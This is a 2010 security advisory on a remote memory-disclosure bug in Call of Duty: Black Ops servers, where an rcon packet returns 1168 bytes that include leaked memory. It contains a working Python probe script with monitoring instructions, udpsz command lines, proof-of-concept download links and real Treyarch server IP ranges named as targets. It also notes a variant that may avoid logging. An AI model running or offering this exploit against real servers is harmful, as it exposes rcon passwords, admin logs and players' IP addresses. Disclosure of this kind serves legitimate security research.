#######################################################################

                             Luigi Auriemma

Application:  Call of Duty: Black Ops
              http://www.callofduty.com
Versions:     unknown, refer to the release date of this advisory
Platforms:    unknown (it should be Windows)
Bug:          memory leak
Exploitation: remote, versus server
Date:         18 Nov 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Call of Duty: Black Ops (cod7) is the new game of the CoD series.
Just like cod6, this one is also distributed as "client-only", which
means that a normal user cannot host a server: only some hosting
companies (GameServers) or Treyarch itself can run dedicated servers.


#######################################################################

======
2) Bug
======


When the server receives an rcon packet (opcode 0x00) it replies with a
packet of a fixed size of 1168 bytes, regardless of how short the actual
content of the reply is. The bytes after the real content are whatever
the server's buffer held at that moment, so various parts of the
server's memory are disclosed remotely to anyone.

By continuously sending these invalid rcon packets it is possible to
monitor the server and possibly retrieve sensitive information such as
the values of cvars (including the rcon password), parts of the logs
(including the output of the admin's previous rcon commands), parts of
the server's configuration and the IP addresses of the other players.
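Added example, not part of the original advisory and not code from udpsz
or cod7mem: a Python script that builds the same rcon probe the udpsz
command lines in this advisory send, splits a reply of the fixed 1168-byte
size into the genuine reply string and the leaked tail, and pulls
printable strings out of the tail, which is how one would spot cvar
values, log fragments and IP addresses in the disclosed memory.
Assumptions not stated in the advisory: the legitimate reply content is a
NUL-terminated string, so everything after the first NUL is treated as
leaked memory; SAMPLE_REPLY and every value inside it are constructed for
the example.

```python
"""
Added example, not part of the original advisory and not Luigi Auriemma's
udpsz/cod7mem code.  Builds the rcon probe from the advisory's command
lines and splits a fixed-size (1168-byte) reply into the genuine reply
string and the trailing, leaked memory.

Assumption (not stated by the advisory): the genuine reply content is a
NUL-terminated string and everything after the first NUL is stale buffer
content.  SAMPLE_REPLY is constructed for this example; its values are fake.
"""
import socket
import sys

REPLY_SIZE = 1168          # fixed reply size reported in the advisory
COD7_PORT = 3074           # UDP port used in the advisory's command lines
RCON_OPCODE = b"\x00"


def build_probe(payload: bytes = b"\x00" * 8) -> bytes:
    """ffffffff connectionless header, rcon opcode 0x00, then the payload.
    The default payload is the 8 NUL bytes of the advisory's first command;
    pass bytes.fromhex("6100000000000000") for the second variant."""
    return b"\xff\xff\xff\xff" + RCON_OPCODE + payload


def split_reply(reply: bytes):
    """Return (reply_string, leaked_tail).  Assumption: the legitimate part
    ends at the first NUL; the rest is whatever the server's buffer held."""
    nul = reply.find(b"\x00")
    if nul < 0:
        return reply, b""
    return reply[:nul], reply[nul + 1:]


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs of at least min_len bytes: the quick filter for
    cvar values, log fragments and IP:port strings in the leaked region."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def analyze(reply: bytes) -> dict:
    """Summarize one reply: fixed size or not, the real content, how many
    bytes of memory came along with it, and the strings found in them."""
    text, tail = split_reply(reply)
    return {
        "fixed_size": len(reply) == REPLY_SIZE,
        "reply_string": text.decode("latin-1"),
        "leaked_bytes": len(tail),
        "strings": extract_strings(tail),
    }


def new_strings(previous: bytes, current: bytes) -> list:
    """Strings present in the current leak but not in the previous one.
    Repeating the probe and watching this list is the 'monitoring' the
    advisory describes: the buffer changes as the server logs and
    handles other traffic."""
    seen = set(extract_strings(split_reply(previous)[1]))
    return [s for s in extract_strings(split_reply(current)[1]) if s not in seen]


def probe(host: str, port: int = COD7_PORT, payload: bytes = b"\x00" * 8,
          timeout: float = 2.0) -> bytes:
    """Send one probe over UDP and return the raw reply.  Needs network
    access and a live server; the sample below does not use it."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(payload), (host, port))
        data, _ = sock.recvfrom(4096)
    return data


# Constructed sample reply: a placeholder reply string, then stale buffer
# content of the kinds the advisory says are exposed (all values invented),
# padded out to the fixed size the server is described as sending.
_STALE = (
    b'seta rcon_password "hunter2"\x00'
    b"192.0.2.10:3074\x00"
    b"\x01\x02\x03\x04"
    b"say hello from the admin\x00"
)
SAMPLE_REPLY = b"reply\x00" + _STALE
SAMPLE_REPLY += b"\x00" * (REPLY_SIZE - len(SAMPLE_REPLY))

if __name__ == "__main__":
    reply = probe(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REPLY
    result = analyze(reply)
    print(f"fixed size: {result['fixed_size']}, leaked bytes: {result['leaked_bytes']}")
    print("reply string:", repr(result["reply_string"]))
    for s in result["strings"]:
        print("  leaked:", s)
```

Run it with a server address to probe a live host, or with no arguments
to analyze the constructed sample. To reproduce the "monitoring" use,
repeat probe() and pass consecutive replies to new_strings(): anything
that appears between two probes came from the server's buffer in the
meantime.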
#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/cod7mem.zip

  udpsz -C "ffffffff 00 0000000000000000" -D SERVER 3074 -1

or, with the filter for easier visualization and monitoring:

  udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll SERVER 3074 -1

For example, the Treyarch servers are available in a range that covers
several C classes like 173.199.77.x, 173.199.78.x, 173.199.79.x and so
on.

It's possible to use "ffffffff 00 6100000000000000" instead, which
produces a reply string shorter than 50 bytes and therefore leaves more
of the 1168-byte packet filled with server memory, but I don't know if
it will appear in the server's logs because it could be considered a
password guessing attack.


#######################################################################

======
4) Fix
======


No fix.


#######################################################################